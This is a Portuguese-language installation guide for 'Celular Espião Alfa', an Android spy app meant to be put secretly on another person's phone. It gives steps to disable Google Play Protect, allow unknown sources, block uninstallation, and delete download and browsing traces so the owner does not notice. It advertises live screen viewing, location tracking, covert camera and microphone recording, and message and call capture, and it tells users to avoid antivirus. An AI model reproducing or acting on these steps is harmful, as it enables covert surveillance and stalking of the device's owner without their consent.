Teste Grátis

Clique no botão abaixo para fazer download do app, em seguida siga os passos da instalação!

ou digite o link https://go.aws/3bouipz

Como instalar

Pré-Instalação

Cada modelo de celular e cada versão do Android, pode ter um caminho diferente para as configurações, confira abaixo o procedimento de cada marca.

Obs.: Todos os modelos de celulares com Android atualizado para 2018, mudou o menu "Fontes Desconhecidas" para "App Desconhecidos".

1º Passo: No menu do aparelho, clique em Configurações > Segurança > e ative o menu “Fontes desconhecidas”.
Não achou? Então tente outro caminho, Configurações > Aplicações > "Fontes desconhecidas" e ative, apenas isso.
Obs: Em alguns telefones não terá o menu Configurações, nesse caso o nome será ajustes ou configurar.

2º Passo: No menu do aparelho, clique em Configurações > clique em google > clique em segurança  e por fim  > clique em "Play Protect". Após clicar em play protect você vai ver uma engrenagem do lado direito, clique na engrenagem e desative.

3º Passo: Vá em "Play Store" clique nas opções que fica no lado superior esquerdo, esta no formato de 3 tracinhos, depois clique em "configurações" e desative a "atualização de apps automaticamente"


Instalação

Você pode seguir o passo a passo ou assistir o vídeo!

1º Passo: Acesse o site www.celularespiaoalfa.com.br e clique no ícone do menu no canto superior esquerdo da tela, e então clique na opção ‘Teste Grátis’.

  

 

2º Passo: Permitir download de aplicativos de fontes desconhecidas no aparelho.

 

2.1 – Desativar o Google Play Protect (para que o aplicativo funcione perfeitamente), acessando: configurações > Google > segurança > Google Play Protect > ícone de engrenagem no canto superior direito > desmarque as duas opções que aparecem na tela.

        

 

2.2 – Desativar a atualização automática de aplicativos na Play Store

        

 

3º Passo: Digitar o código de autorização para o acesso ao aplicativo (125).

 

4º Passo: Ativar a proteção do sistema, para dificultar a desinstalação do aplicativo.

 

5º Passo: Marcar todas as opções mostradas na tela para perfeito funcionamento do aplicativo.

  

 

6º Passo: Fazer o cadastro no aplicativo (Modelo do celular*/Nome/Sobrenome/E-Mail/senha)

  

 

7º Passo: Acessar a configuração de serviços instalados em: configurações > acessibilidade > serviços instalados.

 

8º Passo: Ativar a configuração “SISTEMAS” no menu de serviços instalados, descrito no item anterior (para possibilitar o monitoramento de redes sociais).

  

 

9º Passo: Excluir os registros da instalação do aplicativo:

9.1 – Excluir o download do aplicativo, acessando o local no aparelho onde se localizam os arquivos de downloads.

 

9.2 – Excluir o histórico de navegação, para esconder todos acessos ao site do Celular Espião.

     

 

9.3 – Excluir o histórico de navegação de aplicativos do celular. Clicando no ícone no canto inferior direito ou esquerdo (dependendo do aparelho) da tela inicial, e removendo todo o histórico de aplicativos acessados.

 

10º Passo: Reiniciar o celular, para remover possíveis ícones do aplicativo presentes no aparelho.

 

Pós-Instalação

 

OBS: o acesso aos registros do aplicativo deve ser feito através de um aparelho diferente do qual o aplicativo foi instalado.

 

1º Passo: Acesse o site www.celularespiaoalfa.com.br e clique no ícone do menu no canto superior esquerdo da tela, e então clique na opção ‘Acessar Painel’.

 

2º Passo: Digite o login e senha cadastrados na instalação do aplicativo. Dentro do painel estão listados todos os aplicativos e funções acessadas no celular, clicando nelas é possível ver todos os registros.

 

Funções extras do aplicativo, acessíveis no item ferramentas do menu do painel:

Função telepatia – Acesso à tela do aparelho monitorado em tempo real.

Função perseguição – Mapa das localizações percorridas com o aparelho.

Função Vídeo – O aplicativo liga a câmera do aparelho e grava o vídeo do que está sendo mostrado.

Função Áudio – O aplicativo liga o microfone do aparelho e grava o áudio que está sendo captado

Função Áudio e Vídeo – Reúne as duas funções descritas nos itens anteriores, gravando áudio e vídeo sendo captados.


Pós-Instalação

Observações importantes para o bom funcionamento do Celular Espião Alfa.

1) Após realizar a instalação teste ou definitiva acesse seu painel de controle, ali você deve imediatante configurar seu painel. No canto superior direito do seu painel de controle você tem "Configurações", assinale as opções que deseja monitorar e as salve, segue uma imagem para orientação.

2) O celular que está sendo monitorado deve possuir sinal de Internet razoável, a qualidade do sinal e resposável por salvar arquivos e enviá-los até você.

3) O software espião recebe manutenção constante e por isso funciona 100%, caso alguma função não estiver funcionando poderá ser devido a um problema de sinal de internet ou incompatibilidade do celular que está sendo rastreado.

4) A Instalaçãoo de antivírus e a verificação de aplicativos do google podem cortar a internet do nosso programa, o que recomendamos para o funcionamento total do programa é que o usuário não instale nenhum antivirus no telefone, longe do nosso programa ser vírus, mas você sabe que nosso programa trabalha escondido em segundo plano e por isso pode ser detectado e interpretado por algumas empresas de antivírus por estar trabalho 48 horas em segundo plano, portando repetimos mais uma vez que é dever do usuário não instalar nenhum antivírus e desativar a verificação de aplicativos do google e desativar google play protec para nosso programa funcionar 100%, caso um antivírus seja instalado desative-o e reinstale o software que ele voltará a funcionar imediatamente, você não perderá sua conta por isso.

5) Um aplicativo para operar precisa estar instalado no aparelho celular, em caso de desinstalação, formatação do aparelho ou reset obviamente que o programa não estara no aparelho e por isso não estará operando.

A responsabilidade do aplicativo estar no celular e do usuário assim como outros precedentes, nós apenas fornecemos o produto e posteriormente o suporte, nada mais.


ATENÇÃO

É importante saber que nem todos os telefones com sistema operacional android suporta a gravação de chamadas, alguns vão gravar os dois lados da ligação, ou seja do áudio da conversa, alguns podem gravar apenas 1 lado da chamada, essa incompatibilidade de modelo de aparelho e versão de android tambem pode afetar o whatsapp, que talvez funcione parcialmente ou seja receberá só áudios ou só mensagens até que o aparelho se ajuste ao nosso sistema.